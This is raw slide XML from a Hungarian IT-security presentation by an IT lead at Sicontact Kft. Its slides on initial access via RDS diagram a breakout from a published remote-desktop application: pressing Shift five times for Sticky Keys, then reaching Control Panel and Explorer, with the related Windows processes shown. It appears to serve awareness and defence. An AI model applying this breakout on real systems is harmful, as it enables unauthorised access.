Target="../media/image94.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.svg"/><Relationship Id="rId30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8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9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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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9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9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D5EF3-9705-62D8-F176-983E9F579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igital image of a planet earth&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2B1A39-B499-647E-712F-A9BC8B7392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B8FE2DC-0450-D9EC-48E9-884124D18EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10881360" cy="10287000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150" sz="360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F069D18-D45C-0BF4-C560-2591CFD304D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-202884" y="2614780"/>
            <a:ext cx="9858376" cy="1911292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0" kern="1200" baseline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ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="13800" dirty="0" smtClean="0"/>
              <a:t>MI a baj?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="16600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FBE731D2-DE19-8443-0F50-B4146E1CE84C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668383" y="7321824"/>
            <a:ext cx="7848600" cy="4431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b="0" i="0" kern="1200" baseline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None/>
              <a:defRPr sz="3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None/>
              <a:defRPr sz="3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 panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3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17F"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Béres Péter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IT vezető</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, Sicontact Kft.</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="3200" dirty="0">
              <a:solidFill>
                <a:prstClr val="whit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181002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3C2F0-3430-AED2-64F8-E1D78001E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Rectangle: Rounded Corners 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76BE2A5C-F477-E226-9F22-E4EDCF920864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4294795" y="1954176"/>
            <a:ext cx="8934954" cy="702988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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB8184A-12AA-367B-D962-F3EDBFD9B86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059076" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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23"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>- RDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4754" b="1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06A61D82-B644-8CF4-5268-776E64A9DAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138079" y="1954176"/>
            <a:ext cx="3780777" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>RDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>futtatja az alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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FD9DD066-2A25-DB8C-3D32-3FE1E6C4B310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880918" y="1961986"/>
            <a:ext cx="3102158" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sticky Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>elindítva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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8AB8620-D9E3-B883-9DD7-D143B1071118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13605688" y="1961986"/>
            <a:ext cx="3473660" cy="4770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hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vezérlőpult -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer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5252" y="0"/>
            <a:ext cx="2422748" cy="69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1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6F9A1-3063-B566-786F-3A7203DF2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Rectangle: Rounded Corners 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54153612-F254-18A3-7AEA-302B47964A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723854" y="1924050"/>
            <a:ext cx="8934954" cy="702988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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D6FCE6-B027-3A53-59E1-628E11BB09D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059076" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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23"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>- RDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4754" b="1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BD33AF18-5D1C-0A7D-6907-5B7FD8F7543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119462" y="1956357"/>
            <a:ext cx="3806902" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>RDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>futtatja az alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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1019404-C37B-A190-7D9B-5894C9216988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598564" y="1956357"/>
            <a:ext cx="3102158" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sticky Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>elindítva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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B5A7B042-D3F3-8170-29E1-7BC29D325F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13137357" y="1950271"/>
            <a:ext cx="3473660" cy="4770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hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vezérlőpult -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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6AB07FAB-512C-F8A9-DBF4-FBA8AE800D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2886651" y="3039897"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="1902758" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1823DA6B-4BE2-159C-794B-8BA96A146F15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="1902757" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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2" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377E81BD-9F30-DBD5-86D4-31A8A99F5104}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324833" y="1138270"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>winlogon.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Rectangle: Rounded Corners 368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6AA38FA-076C-454B-1B18-218C2288ECA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544080" y="5705913"/>
            <a:ext cx="2909979" cy="104741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[SHIFT] x 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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AE0B2970-1224-B47B-DB4B-DD94CF8C251E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="417810" y="4375133"/>
            <a:ext cx="3031779" cy="3096136"/>
            <a:chOff x="417810" y="4375133"/>
            <a:chExt cx="3031779" cy="3096136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Elbow Connector 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E2FCFC-49AE-816A-A636-8B258D98A487}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="260808" y="4895772"/>
              <a:ext cx="583229" cy="218109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6EBE544F-06C7-A148-8BFA-0D5D23662F8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1093728" y="6683254"/>
              <a:ext cx="2355861" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="2677150" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB74E27-F850-E5F7-364A-AA29B5F09A7F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2666325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54" name="Graphic 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95975248-6C6F-918E-FFF1-485730053E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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3B5224-0A3C-55AA-493E-D552EFFBE2D5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1935834" cy="834390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rdpshell.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DED8D8-D3C8-EDCD-D900-19F69133FC87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="53" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="153380" y="6142121"/>
              <a:ext cx="1564948" cy="315748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33467531-8F41-57DF-6292-896CAAF60E23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1044004" y="5677075"/>
              <a:ext cx="2291285" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="2603767" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B53D96-8270-3591-25C6-351372037B56}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="2571294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89" name="Graphic 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E273A78-21EB-12EE-343A-E80D24B757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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C47063-FBEF-0D98-E227-1784C50188C8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1862450" cy="834390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outlook.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="91" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E9FC4C-0C32-7023-52EB-A3F9585AC55D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="88" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="485496" y="5517782"/>
              <a:ext cx="851690" cy="265326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935D5F4-E920-4491-8032-B6561C4DB4B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="661477" y="4897227"/>
              <a:ext cx="2768022" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3145521" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C2C443-B8E2-8784-A71F-9312E3A91461}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2404204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6" name="Graphic 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1545BB48-5C53-1CE1-49C2-ABA5E9EAA5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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97FC3D53-3ACC-8486-CA14-CA2450EB1A4D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341701" y="914400"/>
                <a:ext cx="2404204" cy="834390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rdpinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="373" name="Group 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF67AF5A-50B2-9968-E448-F8E1677F79C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="417810" y="4375133"/>
              <a:ext cx="1768546" cy="442159"/>
              <a:chOff x="12235545" y="1103018"/>
              <a:chExt cx="2009738" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="374" name="Rounded Rectangle 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC35CBC-7C5D-115D-0A23-FB8B1E6C3176}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2009737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5" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCFAA85-E90E-AEEB-ABEF-0583E1379B39}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12379151" y="1139122"/>
                <a:ext cx="1866132" cy="431225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userinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08CB3230-4493-6F4A-E349-42CE3DC66036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="375" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2173535" y="3517779"/>
            <a:ext cx="1107902" cy="1082259"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
